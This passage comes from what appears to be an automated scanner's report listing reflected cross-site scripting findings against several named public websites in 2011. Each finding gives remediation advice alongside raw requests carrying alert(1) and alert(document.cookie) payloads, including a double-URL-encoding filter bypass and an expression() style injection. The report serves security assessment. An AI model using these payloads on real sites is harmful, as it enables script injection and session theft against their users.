Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /946e9%253balert%25281%2529%252f%252f48748d09025 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywoodpix.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:39:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=8p8i2f4pf0io221g8g4em3r5n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 62108


<html>
<head>
<title>Celebrity Picture Gallery - hollywoodpix.net</title>
<META NAME="Description" CONTENT="Celebrity picture gallery, pictures of top celebrities at ho
...[SNIP]...
<script type='text/javascript'>
                       function blockGalleryNo()
                       {
                           var block = gal_PAGENO.value;
                           F946e9;alert(1)//48748d09025.innerHTML="<b class='galleryBlocked'>
...[SNIP]...

6.62. http://www.hollywoodpix.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollywoodpix.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dfd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5516ecf1b4 was submitted in the REST URL parameter 1. This input was echoed as 4dfd3"><script>alert(1)</script>d5516ecf1b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /4dfd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5516ecf1b4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywoodpix.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:39:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=kqk8t1qm2f6p1dtp39jkdcb5i1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 87473


<html>
<head>
<title>Celebrity Picture Gallery - hollywoodpix.net</title>
<META NAME="Description" CONTENT="Celebrity picture gallery, pictures of top celebrities at ho
...[SNIP]...
<input type='hidden' id='gal_PAGENO' value="4dfd3"><script>alert(1)</script>d5516ecf1b4"/>
...[SNIP]...

6.63. http://www.homegauge.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.homegauge.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f965d<script>alert(1)</script>cfaf1370acb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof965d<script>alert(1)</script>cfaf1370acb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homegauge.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.26
P3P: CP="DSP ALL CUR OUR PUBi BUS NAV COM STA INT PHY DEM UNI ONL"
Set-Cookie: JSESSIONID=abcRFn1u9D6k75Nk7x1_s; path=/
Content-Type: text/html
Date: Tue, 03 May 2011 10:20:38 GMT
Content-Length: 13600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equ
...[SNIP]...
<code>/favicon.icof965d<script>alert(1)</script>cfaf1370acb</code>
...[SNIP]...

6.64. http://www.hymnary.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hymnary.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c92d6<script>alert(1)</script>8a2f59a25fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc92d6<script>alert(1)</script>8a2f59a25fd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hymnary.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:24:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: SESS7ef49f7ffc66adccad7f6b2cfd02eb5b=76e639fcf89a59fc5d9abe79185bf858; expires=Thu, 02-Jun-2011 11:24:46 GMT; path=/; domain=.hymnary.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 11:24:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 8447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
...[SNIP]...
<code>/favicon.icoc92d6<script>alert(1)</script>8a2f59a25fd</code>
...[SNIP]...

6.65. http://www.logicbuy.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logicbuy.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d073c'%3b61be3f43d3a was submitted in the REST URL parameter 1. This input was echoed as d073c';61be3f43d3a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icod073c'%3b61be3f43d3a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.logicbuy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="CAO PSA OUR"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 59559
Expires: Tue, 03 May 2011 10:32:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:32:49 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=e3uhquzqgsrhndqruftqoj45; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var loginurl = '/error.aspx?404;http://www.logicbuy.com:80/favicon.icod073c';61be3f43d3a&login=facebook';
</script>
...[SNIP]...

6.66. http://www.makefive.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makefive.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc47d"><script>alert(1)</script>e841b7ed957 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icobc47d"><script>alert(1)</script>e841b7ed957 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.makefive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:13:17 GMT
Server: Apache/2.2.11 (Ubuntu)
X-Powered-By: PHP/5.2.6-3ubuntu4.2; Qcodo/0.3.43 (Qcodo Beta 3)
Set-Cookie: PHPSESSID=hgs9m6qq5ee30f0it2nt7gf6j0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: userID=0; expires=Tue, 03-May-2011 12:13:18 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<form method="post" id="shiftCMSPageForm" action="/favicon.icobc47d"><script>alert(1)</script>e841b7ed957">
...[SNIP]...

6.67. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/'+upickemDeals[0][2]+'

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2deb"style%3d"x%3aexpression(alert(1))"57591651e78 was submitted in the REST URL parameter 1. This input was echoed as a2deb"style="x:expression(alert(1))"57591651e78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /appa2deb"style%3d"x%3aexpression(alert(1))"57591651e78/scripts/ajaxModules/'+upickemDeals[0][2]+' HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00c8fc6'%3balert(document.cookie)//110369244fe&regLink=true&title=&upickemSignup=&limit=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4681924
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 17:36:00 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 1.2729
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp10
Content-Length: 35430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/appa2deb"style="x:expression(alert(1))"57591651e78/scripts/ajaxmodules/'+upickemdeals[0][2]+'/">
...[SNIP]...

6.68. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/'+upickemDeals[0][2]+'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b31c7"%3b6118f9ecd9e was submitted in the REST URL parameter 1. This input was echoed as b31c7";6118f9ecd9e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /appb31c7"%3b6118f9ecd9e/scripts/ajaxModules/'+upickemDeals[0][2]+' HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00c8fc6'%3balert(document.cookie)//110369244fe&regLink=true&title=&upickemSignup=&limit=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4681420
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 17:36:02 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.7639
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp8
Content-Length: 35372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/appb31c7";6118f9ecd9e/scripts/ajaxmodules/'+upickemdeals[0][2]+'/"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""

...[SNIP]...

6.69. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [bg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the bg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cba3a'%3balert(1)//ea881ebf66b was submitted in the bg parameter. This input was echoed as cba3a';alert(1)//ea881ebf66b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eeecba3a'%3balert(1)//ea881ebf66b&headerBg=330066&headerColor=FF4A00&countColor=FF4A00&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Date: Tue, 03 May 2011 15:41:06 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 5917

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
<style type="text/css">';
       htmlString += '.upickem-deal-of-the-day .countdown div { display: inline; }';
       htmlString += '.upickem-deal-of-the-day { background: #eeecba3a';alert(1)//ea881ebf66b; border: 1px solid #330066; padding: 0 15px 15px 15px; } ';
       htmlString += '.upickem-deal-of-the-day h3 { background: #330066; color: #FF4A00; padding: 0 10px; line-height: 34px; margin: -1px -16p
...[SNIP]...

6.70. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [countColor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the countColor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8fc6'%3balert(1)//110369244fe was submitted in the countColor parameter. This input was echoed as c8fc6';alert(1)//110369244fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00c8fc6'%3balert(1)//110369244fe&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 15:41:36 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 5917

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
{ float: left; margin-right: 10px; }';
       htmlString += '.upickem-deal-of-the-day dd a { font-weight: bold; color: #000; }';
       htmlString += '.upickem-deal-of-the-day dd.countdown { color: #FF4A00c8fc6';alert(1)//110369244fe; margin-top: 5px; font-weight: bold; }';
       htmlString += '.upickem-deal-of-the-day dd.more-deals { padding-top: 5px; font-size: 11px; }';
       htmlString += '.upickem-deal-of-the-day #upickemSignupForm
...[SNIP]...

6.71. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [headerBg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the headerBg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 953e2'%3balert(1)//e535c35fe5 was submitted in the headerBg parameter. This input was echoed as 953e2';alert(1)//e535c35fe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066953e2'%3balert(1)//e535c35fe5&headerColor=FF4A00&countColor=FF4A00&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 15:41:15 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 5970

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
<style type="text/css">';
       htmlString += '.upickem-deal-of-the-day .countdown div { display: inline; }';
       htmlString += '.upickem-deal-of-the-day { background: #eee; border: 1px solid #330066953e2';alert(1)//e535c35fe5; padding: 0 15px 15px 15px; } ';
       htmlString += '.upickem-deal-of-the-day h3 { background: #330066953e2';alert(1)//e535c35fe5; color: #FF4A00; padding: 0 10px; line-height: 34px; margin: -1px -16p
...[SNIP]...

6.72. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [headerColor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the headerColor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70e87'%3balert(1)//b5f2410c5a5 was submitted in the headerColor parameter. This input was echoed as 70e87';alert(1)//b5f2410c5a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A0070e87'%3balert(1)//b5f2410c5a5&countColor=FF4A00&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Date: Tue, 03 May 2011 15:41:32 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 5917

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
lString += '.upickem-deal-of-the-day { background: #eee; border: 1px solid #330066; padding: 0 15px 15px 15px; } ';
       htmlString += '.upickem-deal-of-the-day h3 { background: #330066; color: #FF4A0070e87';alert(1)//b5f2410c5a5; padding: 0 10px; line-height: 34px; margin: -1px -16px 15px -16px; }';
       htmlString += '.upickem-deal-of-the-day dt img { max-width: 75px; }';
       htmlString += '.upickem-deal-of-the-day dt { float:
...[SNIP]...

6.73. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [upickemSignup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the upickemSignup request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4979f'%3balert(1)//e88e0fd8bd0 was submitted in the upickemSignup parameter. This input was echoed as 4979f';alert(1)//e88e0fd8bd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00&regLink=true&title=&upickemSignup=4979f'%3balert(1)//e88e0fd8bd0&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Date: Tue, 03 May 2011 15:42:31 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 6220

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
k('dealCounter',cDates[1], cDates[2], cDates[3], cDates[4], cDates[5], cDates[6], 1);
   
       var WidgetConfig = new Object();
   WidgetConfig.DivID = 'upickemSignupForm';
   WidgetConfig.ConfigurationGUID = '4979f';alert(1)//e88e0fd8bd0';
   WidgetConfig.Scroll = 'auto';
   WidgetConfig.Height = '75';
   WidgetConfig.Width = 'auto';
   CreateEmailSignupWidget(WidgetConfig);
   }

6.74. http://www.maysville-online.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.maysville-online.com
Path:   /app/weather/qwikcast_feed0.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63b87"%3bca31f7e83db was submitted in the REST URL parameter 1. This input was echoed as 63b87";ca31f7e83db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app63b87"%3bca31f7e83db/weather/qwikcast_feed0.xml HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: TNNoMobile=1; s_cc=true; s_pv=no%20value; s_sq=%5B%5BB%5D%5D; __qca=P0-1669904396-1304455296993

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4682452
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
